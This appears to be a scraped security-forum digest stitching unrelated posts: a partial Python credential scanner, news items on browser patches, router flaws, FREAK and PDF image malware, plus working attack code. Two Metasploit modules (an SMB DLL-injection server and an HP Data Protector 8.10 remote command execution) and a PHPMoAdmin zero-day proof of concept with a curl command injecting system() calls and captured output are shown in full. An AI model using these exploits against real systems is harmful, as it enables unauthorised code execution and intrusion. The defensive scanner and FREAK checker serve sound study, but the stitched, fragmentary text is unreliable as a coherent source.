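        severity = "high"                # looks like a production credential
    masked = password[:1] + "*" * (len(password) - 1) if password else ""
    return {"path": path, "kind": kind, "host": host, "user": user,
            "password": masked, "severity": severity}


def scan_file(path, text):
    if path.endswith("sftp-config.json"):
        f = dict(SFTP_FIELD.findall(text))
        return triage(path, "sftp", f.get("host"), f.get("user"), f.get("password"))
    if path.endswith("wp-config.php"):
        f = {k.lower(): v for k, v in WP_DEFINE.findall(text)}
        return triage(path, "wordpress-db", f.get("host"), f.get("user"), f.get("password"))
    return None


def scan_repo(files):
    """files: {path: contents}. Returns the findings, worst first."""
    order = {"high": 0, "low": 1, "info": 2}
    found = [r for r in (scan_file(p, t) for p, t in files.items()) if r]
    return sorted(found, key=lambda r: order[r["severity"]])


if __name__ == "__main__":
    for finding in scan_repo(SAMPLES):
        print("%(severity)-4s %(kind)-13s %(user)s@%(host)s  (%(path)s)" % finding)
```

Run it over a checkout before pushing (a pre-commit hook is the natural place) and treat every "high" finding as a credential to rotate, not just a line to delete: once a secret has been in a public commit it has to be assumed copied, which is the article's point about the six months Uber's key sat on GitHub.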
-
Google and Mozilla have upgraded their flagship browsers, crushing bugs and cracking down on bad certificates along the way. The Choc Factory's Chrome 41 swats 51 bugs, of which at least 13 are classified as high severity and six considered medium risks. Google engineer Penny MacNeil thanked security researchers for the effort to identify the bugs. "We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel," MacNeil says. Here's this month's ameliorated messes:

[$7500][456516] High CVE-2015-1212: Out-of-bounds write in media. Credit to anonymous.
[$5000][448423] High CVE-2015-1213: Out-of-bounds write in skia filters. Credit to cloudfuzzer.
[$5000][445810] High CVE-2015-1214: Out-of-bounds write in skia filters. Credit to cloudfuzzer.
[$5000][445809] High CVE-2015-1215: Out-of-bounds write in skia filters. Credit to cloudfuzzer.
[$4000][454954] High CVE-2015-1216: Use-after-free in v8 bindings. Credit to anonymous.
[$3000][456192] High CVE-2015-1217: Type confusion in v8 bindings. Credit to anonymous.
[$3000][456059] High CVE-2015-1218: Use-after-free in dom. Credit to cloudfuzzer.
[$3000][446164] High CVE-2015-1219: Integer overflow in webgl. Credit to Chen Zhang (demi6od) of NSFOCUS Security Team.
[$3000][437651] High CVE-2015-1220: Use-after-free in gif decoder. Credit to Aki Helin of OUSPG.
[$2500][455368] High CVE-2015-1221: Use-after-free in web databases. Credit to Collin Payne.
[$2500][448082] High CVE-2015-1222: Use-after-free in service workers. Credit to Collin Payne.
[$2000][454231] High CVE-2015-1223: Use-after-free in dom. Credit to Maksymillian Motyl.
[449610] High CVE-2015-1230: Type confusion in v8. Credit to Skylined working with HP's Zero Day Initiative.
[$2000][449958] Medium CVE-2015-1224: Out-of-bounds read in vpxdecoder. Credit to Aki Helin of OUSPG.
[$1000][446033] Medium CVE-2015-1225: Out-of-bounds read in pdfium. Credit to cloudfuzzer.
[$1000][456841] Medium CVE-2015-1226: Validation issue in debugger. Credit to Rob Wu.
[$1000][450389] Medium CVE-2015-1227: Uninitialized value in blink. Credit to Christoph Diehl.
[$1000][444707] Medium CVE-2015-1228: Uninitialized value in rendering. Credit to miaubiz.
[$500][431504] Medium CVE-2015-1229: Cookie injection via proxies. Credit to iliwoy.

Mozilla's update to Firefox version 37 includes a revocation feature to bolster the killing of bad intermediate certificates. OneCRL replaces the Online Certificate Status Protocol, which is less effective because it relies on third parties to keep updated registries of their valid and revoked certificates. Certificates were often accepted as soft-fails when the status could not be determined due to some technical or connectivity failure. Mozilla's new list operates in the browser and is populated by issuers who push certificate status, instead of the browser having to do the fetching. This block-list, already used for blacklisting bad plugins and drivers, will now speed up checking times because it avoids the need for Mozilla to push out updates that require browser restarts, Mozilla security boffin Mark Goodwin says. "OneCRL helps speed up revocation checking by maintaining a centralised list of revoked certificates and pushing it out to browsers. Currently, if a serious incident occurs that requires certificates to be revoked, we release an update to Firefox to address the problem. "This is slow because it takes some time for users to get the security update and restart their browsers. There's also cost involved in producing an update and in users downloading it." Goodwin points to a blog by Google's Adam Langley, who said last year that the old revocation checking did little to improve security. OneCRL for now covers intermediate certificates, to keep the size of Mozilla's blocklist down, and will later be sped up by automating the collection of revoked certificates. Source
-
-
Feature "It is far more common to find routers with critical flaws than without" - Craig Young "It's sad that end-user education about strong passwords, password safes, and phishing can be undone by something as innocuous as the blinking box in the corner of your room." - Peter Adkins

Introduction

Home and small business router security is terrible. Exploits emerge with depressing regularity, exposing millions of users to criminal activities. Many of the holes are so simple as to be embarrassing. Hard-coded credentials are so common in small home and office routers, compared to other tech kit, that only those with tin-foil hats bother to suggest the flaws are deliberate. Hacker gang Lizard Squad crystallised the dangers – and opportunities – presented by router vulnerabilities when, over the Christmas break, they crafted a slick paid denial of service stresser service that operated on hacked boxes. Customers were found paying to flood targets of choice with gigabits of bandwidth stolen from what the black hats claimed were a fleet of half a million vulnerable and subsequently hacked routers. A year earlier, security boffins at Team Cymru warned that an unknown gang had popped 300,000 routers in a week, altering the DNS settings to point to malicious web entities. Those routers were hacked through a self-propagating worm (PDF) that researchers had already warned about, but not yet seen. It used a mix of brute-force password guessing against web admin consoles, cross-site request forgery, and known unpatched vulnerabilities. Arguably the most infamous hack in recent months was Check Point's so-called Misfortune Cookie, discovered in December 2014. This vulnerability was thought to impact a staggering 12 million routers across 200 models from big names such as Linksys, D-Link, TP-Link, ZTE, and Huawei. Affected routers could be hijacked with a crafted cookie that allows attackers to meddle with just about everything on the units, from password theft, to alterations to DNS, to infection of connected devices. In October Rapid7 had chipped in with its own research, warning that Network Address Translation Port Mapping Protocol configurations in 1.2 million routers were sufficiently borked that remote attackers could spy on internal traffic.

Security is 'abysmal'

"Router security remains abysmal, especially among the cheapest brands," says John Matherly, founder of the popular Shodan search engine, which crawls for internet-connected devices. "Backdoors, no automated patching and default usernames and passwords are just a few of the problems that many SOHO routers continue to face." Matherly last month dug up an estimated 250,000 routers used in Spain that were using the same SSH keys, placing those configured for remote access at heightened risk. He also points to research published two days later by Entrust Solutions hacker Nabin Kc, who found 200,000 home routers contained a firmware backdoor, a flaw replicated across 10 different vendors who seemed to be re-branding a vanilla router. Matherly says badge-engineering seems a common practice for vendors that compete on price over form or function. "It seems that the rate of security problems discovered with routers is only limited by the number of security experts that take the time to analyse the devices," he says. Source
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Generic DLL Injection From Shared Resource',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where a DLL
        can be loaded from an specified SMB share. This module serves payloads
        as DLLs over an SMB service.
      },
      'Author'         =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'References'     =>
        [
          ['CWE', '114']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => false,
      'Platform'       => 'win',
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 04 2015'
    ))

    register_options(
      [
        OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
      ], self.class)

    deregister_options('FILE_CONTENTS')
  end

  def setup
    super
    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    print_status("File available on #{unc}...")
  end
end

Source
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'HP Data Protector 8.10 Remote Command Execution',
      'Description'    => %q{
        This module exploits a remote command execution on HP Data Protector 8.10.
        Arbitrary commands can be execute by sending crafted requests with opcode 28
        to the OmniInet service listening on the TCP/5555 port. Since there is an
        strict length limitation on the command, rundll32.exe is executed, and the
        payload is provided through a DLL by a fake SMB server. This module has been
        tested successfully on HP Data Protector 8.1 on Windows 7 SP1.
      },
      'Author'         =>
        [
          'Christian Ramirez', # POC
          'Henoch Barrera', # POC
          'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module
        ],
      'References'     =>
        [
          ['CVE', '2014-2623'],
          ['OSVDB', '109069'],
          ['EDB', '34066'],
          ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'HP Data Protector 8.10 / Windows', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 02 2014'))

    register_options(
      [
        Opt::RPORT(5555),
        OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
      ], self.class)

    deregister_options('FILE_CONTENTS')
  end

  def check
    fingerprint = get_fingerprint
    if fingerprint.nil?
      return Exploit::CheckCode::Unknown
    end

    print_status("#{peer} - HP Data Protector version #{fingerprint}")

    if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
      minor = $1.to_i
    else
      return Exploit::CheckCode::Safe
    end

    if minor < 11
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Detected
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def get_fingerprint
    ommni = connect
    ommni.put(rand_text_alpha_upper(64))
    resp = ommni.get_once(-1)
    disconnect

    if resp.nil?
      return nil
    end

    Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
  end

  def send_pkt(cmd)
    cmd.gsub!("\\", "\\\\\\\\")
    pkt = "2\x00"
    pkt << "\x01\x01\x01\x01\x01\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x01\x00 "
    pkt << "28\x00"
    pkt << "\\perl.exe\x00 "
    pkt << "-esystem('#{cmd}')\x00"

    connect
    sock.put([pkt.length].pack('N') + pkt)
    disconnect
  end

  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")

    print_status("#{peer} - Trying to execute remote DLL...")
    sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
    send_pkt(sploit)
  end

  def setup
    super
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    unless file_name =~ /\.dll$/
      fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
    end
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end

Source
-
Hi and welcome! (fix your introduction)
-
@kamikazi, 1. That guy with the "flood" is probably just a kid. 2. RST (Romanian Security Team) would never get involved in crap like that (especially NOT DDoS / DoS) (here I'm referring to the Staff). It's probably just a kid who has no connection whatsoever to RST (if he "picked up" some kid with 10 posts around here who helps him "flood", that doesn't mean RST is involved).
-
Beijing has rejected President Obama's criticism of its plan to make tech companies put backdoors in their software and share their encryption keys if they want to operate in China.

On Monday, Mr Obama told the Reuters news agency he had "made it very clear" China had to change its policy if it wanted to do business with the US.

But Beijing said it needed the powers to combat terrorism and tackle leaks. It also suggested the West was guilty of having double standards.

"The legislation is China's domestic affair, and we hope the US side can take a right, sober and objective view towards it," said Chinese foreign ministry spokeswoman Hua Chunying.

"On the information-security issue, there was a [recent] media revelation that a certain country embedded spying software in the computer system of another country's Sim card maker, for surveillance activities. This is only one out of the recently disclosed cases.

"All countries are paying close attention to this and taking measures to safeguard their own information security, an act that is beyond any reproach."

The case she was referring to involved allegations that US cyber-spies had hacked a Dutch Sim card manufacturer in order to help decrypt their targets' communications.

At another press conference, parliamentary spokeswoman Fu Ying drew attention to the fact that the US government had imposed restrictions on Chinese companies including Huawei and ZTE. And she suggested that Beijing's proposals were in line with the same kind of access to internet correspondence sought by the US and British governments.

"We will definitely continue to listen to extensive concerns and all the parties' views, so we can make the law's formulation more rigorous," she added.

The rules are part of a proposed counter-terrorism law set to be discussed by China's annual parliament session, the National People's Congress (NPC), which opens on Thursday.

'Paranoid espionage'

President Obama's comments had followed the publication of a fresh draft of the proposed law, which was made public last week.

It "would essentially force all foreign companies, including US companies, to turn over to the Chinese government mechanisms where they can snoop and keep track of all the users of those services", the US leader said.

"As you might imagine tech companies are not going to be willing to do that," he added.

Microsoft, Cisco, Oracle and IBM are among firms that would potentially be affected.

While the comments by Chinese officials were measured, the government's press service, Xinhua, was more critical.

It accused the US leader of arrogance and hypocrisy, noting that the FBI had criticised Apple and Google last year for building encryption into their smartphone operating systems, and again drew attention to allegations about the US National Security Agency's activities made public by the whistleblower Edward Snowden.

"With transparent procedures, China's anti-terrorism campaign will be different from what the United States has done: letting the surveillance authorities run amok and turn counter-terrorism into paranoid espionage and peeping on its civilians and allies," Xinhua wrote.

"Contrary to the accusations of the United States, China's anti-terror law will put no unfair regulatory pressures on foreign companies, because the provisions will apply to both domestic and foreign firms."

Insecure systems

The Conservative party has indicated it wants to expand the UK's cyber-spies' surveillance powers if it wins the May election.

US firms, including Microsoft, are hoping to boost profits by selling their services to China

"Our manifesto will make clear that we will... use all the legal powers available to us to make sure that, where appropriate, the intelligence and security agencies have the maximum capability to intercept the communications of suspects while making sure that such intrusive techniques are properly overseen," Home Secretary Theresa May told Parliament in January.

One expert said it should be no surprise that the West was finding it difficult to prevent China seeking greater cyber-surveillance powers of its own, but added there were good reasons to fear its proposals.

"Either behind the scenes or increasingly openly, the US and UK are justifying similar behaviour for their own purposes, but are extremely concerned when China asks for its own capabilities," said Dr Joss Wright, from the Oxford Internet Institute.

"But what we don't want to see is a world in which internet-based products and services are riddled with backdoors by every state that says it needs to act against terrorism.

"A backdoor is always a concern because the moment it can be exploited, you have an insecure system by default, and that could make everyone less safe."

Source
-
A new SSL/TLS vulnerability has been discovered that makes it possible to decrypt the HTTPS encryption protocols used between websites and browsers on Apple and Android devices.

The flaw has been dubbed Freak (Factoring attack on RSA-Export Keys) and information on the specifically created freakattack.com website explains that it works by forcing a mobile device browser to use an older, breakable encryption standard.

“The vulnerability allows attackers to intercept HTTPS connections between vulnerable clients and servers and force them to use ‘export-grade’ cryptography, which can then be decrypted or altered,” it said.

“Vulnerable clients include many Google and Apple devices (which use unpatched OpenSSL), a large number of embedded systems, and many other software products that use TLS behind the scenes without disabling the vulnerable cryptographic suites.”

The flaw was uncovered by a team of researchers at SmackTLS.com, who explained that the problem exists because of former US government policy concerning encryption technologies.

“This attack targets a class of deliberately weak export cipher suites. As the name implies, this class of algorithms has been introduced under the pressure of US government agencies to ensure that the National Security Agency would be able to decrypt all foreign encrypted communication, while stronger algorithms were banned from export as they were classified as weapons of war.”

This means that attackers can force a server into deliberately using an encryption key that can be broken in about 12 hours.

“Thus, if a server is willing to negotiate an export cipher suite, a man-in-the-middle [attack] may trick a browser (which normally doesn't allow it) to use a weak export key,” the team explained.

Numerous high-profile websites are affected by the flaw, such as americanexpress.com, groupon.com and whitehouse.gov. Overall, almost 10 percent of the Alexa top million websites could be affected.

V3 contacted Apple and Google for comment on the flaw but had received no reply at the time of publication.

F-Secure researcher Sean Sullivan told V3 that the discovery underlined the risks of trying to control technology like encryption, something that David Cameron has recently made noises about in the UK.

“In the 1990s there was this idea that they could control encryption and code as if it was a tangible thing and ban its export. Here we are 20 years later and you can see how that ideal has backfired,” he said.

“Cameron is making this same point today, but our reliance on encryption is only increasing and, if you try to introduce some ‘weaker’ standards that you want to control, it will come back to haunt you.”

Sullivan added that the risk to web users from the Freak flaw is more theoretical than anything else, as an attacker would need to compromise a website's server and then force a device to accept the older standard.

Nevertheless, the incident demonstrates the risks posed by web browsers and the unintended consequences of trying to create two-tier technology systems.

Source
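Added example, not from the article or the FREAK researchers: a small Python checker that parses a ClientHello and a ServerHello and flags the downgrade the article describes, a server selecting an RSA export suite that the client never offered. The handshake bytes are constructed inline (not a real capture); the cipher suite values are the IANA assignments.

```python
import struct

# Export-grade RSA cipher suites by IANA value (the suites FREAK downgrades to).
RSA_EXPORT_SUITES = {
    0x0003: "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    0x0006: "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
    0x0008: "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA",
    0x000E: "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA",
    0x0014: "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA",
}

def _handshake_body(record, expected_type):
    # Strip the 5-byte TLS record header and the 4-byte handshake header.
    if len(record) < 9 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != expected_type:
        raise ValueError("unexpected handshake message type")
    return hs[4:4 + int.from_bytes(hs[1:4], "big")]

def client_hello_suites(record):
    # ClientHello: version(2) random(32) session_id(1+n) cipher_suites(2+m) ...
    body = _handshake_body(record, 1)
    pos = 2 + 32
    pos += 1 + body[pos]
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]
    raw = body[pos + 2:pos + 2 + cs_len]
    return [struct.unpack("!H", raw[i:i + 2])[0] for i in range(0, cs_len, 2)]

def server_hello_suite(record):
    # ServerHello: version(2) random(32) session_id(1+n) cipher_suite(2) ...
    body = _handshake_body(record, 2)
    pos = 2 + 32
    pos += 1 + body[pos]
    return struct.unpack("!H", body[pos:pos + 2])[0]

def assess(client_hello, server_hello):
    # The FREAK signature: an export suite chosen that the client never offered.
    offered = client_hello_suites(client_hello)
    chosen = server_hello_suite(server_hello)
    return {
        "suite": RSA_EXPORT_SUITES.get(chosen, "0x%04x" % chosen),
        "export": chosen in RSA_EXPORT_SUITES,
        "offered_by_client": chosen in offered,
    }

# Constructed sample messages (not a real capture), TLS 1.0 framing, zero randoms.
def _record(hs_type, body):
    hs = bytes([hs_type]) + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs

def build_client_hello(suites):
    cs = b"".join(struct.pack("!H", s) for s in suites)
    body = (b"\x03\x01" + bytes(32) + b"\x00"      # version, random, empty session id
            + struct.pack("!H", len(cs)) + cs
            + b"\x01\x00")                         # one compression method: null
    return _record(1, body)

def build_server_hello(suite):
    body = b"\x03\x01" + bytes(32) + b"\x00" + struct.pack("!H", suite) + b"\x00"
    return _record(2, body)

# Client offers AES only; a tampered ServerHello selects RSA_EXPORT_WITH_DES40.
SAMPLE = assess(build_client_hello([0x002F, 0x0035]), build_server_hello(0x0008))
```

A client that is not vulnerable would abort at this point because the selected suite is not in its own offer list; a FREAK-affected client accepts it and proceeds to the 512-bit RSA key exchange.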
-
D-Link removes fingers from ears, preps mass router patch
Aerosol posted a topic in Stiri securitate
Amnesia strikes as hacker discloses remote code exec flaws

Domestic router Daddy D-Link is patching dangerous remote access flaws in several models of its networking gear.

The patches follow a round of zero-day disclosures by Canadian researcher Peter Adkins early this week, after D-Link allegedly cut communication while he quietly disclosed the flaws.

The most severe flaw allowed attackers to hijack the devices including changing DNS settings by creating malicious sites which exploit cross-site request forgeries.

D-Link issued an advisory in which it warns DIR models 626L; 636L; 808L; 810L; 820L; 826L; 830, and 836L are open to remote code execution.

D-Link says attackers can upload and run files without authentication from the LAN-side of the device or over the internet if the "external connections" box was taken off default and ticked.

"A second vulnerability reportedly relates to the device’s ping utility that might permit command injection without authentication," the company says of Adkins' work.

"A third vulnerability reportedly may exploit certain chipset utilities in firmware to potentially permit a malicious user an attack disclosing information about the device's configuration."

Adkins told El Reg many of the security failings in home routers could be put down to expansive feature sets.

"The platforms the devices are built upon may be solid - such as OpenWRT - but then additional services are 'bolted in' to provide value-add, and that security seems to go straight out of the window," Adkins says.

Other routers may be affected due to the location of ncc and ncc2 binaries

Fellow router hackers Stefan Viehböck and Jeremy Richards found further flaws in five TRENDnet offerings since patched, plus another D-Link mess.

Adkins reports contact between D-Link and himself ceased around February 23 when D-Link, after confirming receipt of the vulnerability reports on 11 January, said they had no knowledge of the holes and directed him to the company security reporting guide.

The company recommends users run encrypted wireless to prevent the low chance that passing hackers would break into the networks. Only the DIR-820L was patched.

Source

-
Greyscale pics are a great place to hide malcode

Hackers can duck antivirus programs and execute malware in Adobe Reader by using greyscale images, says Danish security boffin Dénes Óvári.

Lossy compression is thought to be susceptible to the DCTDecode filter, which should nuke malware woven into images and blunt this form of attack.

However new intelligence published in the paper Script in a Lossy Stream (PDF) shows bad guys and penetration testers can use the filter within PDF documents to hide malcode using JPEG images that are set to greyscale to avoid distortion.

This process gives antivirus and human malware analysts the slip as they generally assume any malcode hiding in the JPEG filter will be compressed and scrambled.

“Following the introduction of a sandbox for JavaScript code in Acrobat Reader, the use of PDF as an attack vector decreased dramatically,” Óvári says.

“Although this is not a security breach in itself, the fact that the usage of DCTDecode for this purpose has seemingly been ruled out by the industry means that even known threats could be hidden in this way from anti-virus scanners or researchers.

“In order to provide users with maximum protection, the DCTDecode stream must no longer be overlooked: in PDF reader implementations, the referencing of uncompressed image data as parameters from objects expecting binary data should be prohibited.”

Óvári says attacks still require exploits to be used inside the DCTDecode stream, reducing the overall threat presented by the research.

He created a proof of concept attack in which he says a script was encoded as a high-quality greyscale JPEG image, placed in an image object filtered with DCTDecode, and then referenced by a JavaScript action entry.

“When opening the document, the alert dialog just pops up under the old Reader 9, proving that the code of the short script was decompressed losslessly,” he says. The attack still works under the latest version of Reader with some small modification.

Óvári says other file formats that assume data within JPEGs uses lossy compression while a greyscale mode is available should be re-evaluated.

Source
-
######################################################################
#  _     ___  _   _  ____  ____    _  _____
# | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
# | |  | | | |  \| | |  _| |     / _ \ | |
# | |__| |_| | |\  | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website        : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates  : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a stripped-down
version of the Vork high-performance framework.

[+] Exploit
============================================================
Someone was trying to sell this shit for 3000usd lolz

$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system('id;ls -lha');exit

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php

[+] Vulnerability Analysis
============================================================
Filename: moadmin.php

1. create new moadminComponent object

1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set

738: class moadminComponent {
...
762:     public function __construct() {
...
786:         if (isset($_POST['object'])) {
787:             if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code

692:     public function saveObject($collection, $obj) {
693:         eval('$obj=' . $obj . ';'); //cast from string to array

Source